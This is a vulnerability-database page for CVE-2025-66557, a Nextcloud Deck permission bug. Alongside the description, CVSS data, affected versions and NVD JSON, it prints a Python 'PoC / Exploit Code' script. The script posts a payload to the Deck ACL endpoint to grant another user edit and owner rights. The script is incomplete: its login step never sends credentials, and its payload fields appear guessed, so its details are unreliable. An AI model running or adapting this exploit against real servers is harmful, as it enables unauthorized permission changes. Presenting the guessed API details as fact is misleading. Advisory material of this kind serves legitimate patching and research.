Security Vulnerability Report
中文
CVE-2025-66557 CVSS 5.4 MEDIUM

CVE-2025-66557

Published: 2025-12-05 18:15:59
Last Modified: 2025-12-09 16:46:17
Source: [email protected]

Description

Nextcloud Deck is a kanban style organization tool aimed at personal planning and project organization for teams integrated with Nextcloud. Prior to 1.14.6 and 1.15.2, a bug in the permission logic allowed users with "Can share" permission to modify the permissions of other recipients. This vulnerability is fixed in 1.14.6 and 1.15.2.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:nextcloud:deck:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nextcloud:deck:*:*:*:*:*:*:*:* - VULNERABLE
Nextcloud Deck < 1.14.6
Nextcloud Deck < 1.15.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-66557 PoC - Nextcloud Deck Permission Bypass # Target: Nextcloud Deck < 1.14.6 or < 1.15.2 TARGET_URL = "https://vulnerable-nextcloud.example.com" USERNAME = "attacker" PASSWORD = "password123" BOARD_ID = "1" TARGET_USER_ID = "victim" def get_auth_token(): """Authenticate and get Nextcloud session token""" session = requests.Session() # Login to Nextcloud login_url = f"{TARGET_URL}/index.php/login" login_data = { "user": USERNAME, "password": PASSWORD } # Note: Actual implementation depends on Nextcloud API return session def exploit_permission_bypass(session): """Exploit the permission bypass vulnerability""" # The vulnerability allows users with 'Can share' permission # to modify other recipients' permissions exploit_url = f"{TARGET_URL}/index.php/apps/deck/api/v1.0/boards/{BOARD_ID}/acl" # Malicious payload to modify target user's permissions exploit_payload = { "type": "user", "id": TARGET_USER_ID, "participant": { "permission": "edit", # Escalate permission "owner": True } } headers = { "Content-Type": "application/json", "OCS-APIREQUEST": "true" } # Send exploit request response = session.post(exploit_url, json=exploit_payload, headers=headers) if response.status_code == 200: print("[+] Permission bypass successful!") print(f"[+] Response: {response.text}") else: print(f"[-] Exploit failed. Status: {response.status_code}") if __name__ == "__main__": session = get_auth_token() exploit_permission_bypass(session)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66557", "sourceIdentifier": "[email protected]", "published": "2025-12-05T18:15:58.977", "lastModified": "2025-12-09T16:46:17.283", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nextcloud Deck is a kanban style organization tool aimed at personal planning and project organization for teams integrated with Nextcloud. Prior to 1.14.6 and 1.15.2, a bug in the permission logic allowed users with \"Can share\" permission to modify the permissions of other recipients. This vulnerability is fixed in 1.14.6 and 1.15.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:deck:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.14.0", "versionEndExcluding": "1.14.6", "matchCriteriaId": "29F12EA5-770A-4C40-A049-CA2EA77CE016"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:deck:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.15.0", "versionEndExcluding": "1.15.2", "matchCriteriaId": "32A3D86C-1990-4E96-8027-AF235997BE7D"}]}]}], "references": [{"url": "https://github.com/nextcloud/deck/commit/f1da8b30a455f02373d44154da04494c949a95ae", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nextcloud/deck/pull/7131", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-wwr8-hx9g-rjvv", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://hackerone.com/reports/3247499", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.